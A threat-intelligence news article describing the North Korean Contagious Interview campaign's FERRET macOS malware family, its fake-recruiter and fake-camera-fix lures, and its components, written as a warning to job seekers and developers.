FERRET Malware
North Korean cyber operatives behind the Contagious Interview campaign have been found deploying macOS malware strains collectively dubbed FERRET under the guise of a job interview process. Unsuspecting targets are led to communicate with a supposed recruiter via a link that generates an error message, prompting them to install or update software like VCam or CameraAccess to proceed with the interview.
Table of Contents
Contagious Interview: A Persistent Cyber Espionage Effort
Initially uncovered in late 2023, the Contagious Interview represents a sustained campaign aimed at infecting victims through deceptive npm packages and native applications that pose as videoconferencing software. The campaign, also tracked under names such as DeceptiveDevelopment and DEV#POPPER, continues to evolve, employing increasingly sophisticated tactics.
Dropping BeaverTail and InvisibleFerret
The attack sequence typically results in the deployment of BeaverTail, a JavaScript-based malware designed to extract sensitive data from browsers and cryptocurrency wallets. This malware also acts as a delivery mechanism for an additional payload—a Python-based backdoor known as InvisibleFerret.
OtterCookie: Another Layer of Harmful Activity
In December 2024, cybersecurity researchers from Japan identified another component in the attack chain: a malware variant named OtterCookie. This JavaScript malware is configured to fetch and execute additional harmful payloads, further expanding the infection's capabilities.
Refining Evasion Tactics with ClickFix-Style Deception
When the FERRET malware family was discovered towards the end of 2024, researchers noted that attackers were refining their methods to better evade detection. One notable technique involves a ClickFix-style approach, tricking users into copying and executing an unsafe command in the macOS Terminal application under the pretense of resolving camera and microphone access issues.
Targeting Job Seekers Through LinkedIn
The initial phase of these attacks often begins with LinkedIn outreach, where threat actors pose as recruiters. Their primary goal is to persuade potential victims to undergo a video assessment, which ultimately leads to the installation of a Golang-based backdoor. This malware is particularly insidious, designed to drain cryptocurrency funds from MetaMask Wallets while also allowing attackers to perform commands on the compromised device.
Breaking Down the FERRET Malware Components
Researchers have identified several components associated with the FERRET malware family, each serving a distinct function in the attack sequence:
- FROSTYFERRET_UI: The initial-stage payload, often disguised as ChromeUpdate or CameraAccess applications.
- FRIENDLYFERRET_SECD: A secondary Go-based backdoor known as 'com.apple.secd,' previously linked to the Hidden Risk campaign targeting cryptocurrency businesses.
- MULTI_FROSTYFERRET_CMDCODES: A Go configuration file supporting stage two backdoor functionality.
FlexibleFerret: Establishing Persistence on macOS
A separate set of malware artifacts, referred to as FlexibleFerret, has also been discovered. This variant focuses on maintaining persistence within an infected macOS system through the use of a LaunchAgent. The malware is delivered via an installer package named InstallerAlert, mirroring the functionality of 'FROSTYFERRET_UI.'
Expanding Attack Vectors Beyond Job Seekers
While the FlexibleFerret samples were distributed as Apple Installer packages, the precise method used to convince victims to execute them remains unclear. However, evidence suggests that the malware is also being propagated by creating fake issues on legitimate GitHub repositories. This shift in tactics signals a broader targeting strategy that extends beyond job seekers, aiming at developers and other professionals within the tech industry.
As North Korean cyber actors continue refining their deceptive methods, security experts urge heightened vigilance when engaging with online job offers and software installation prompts.
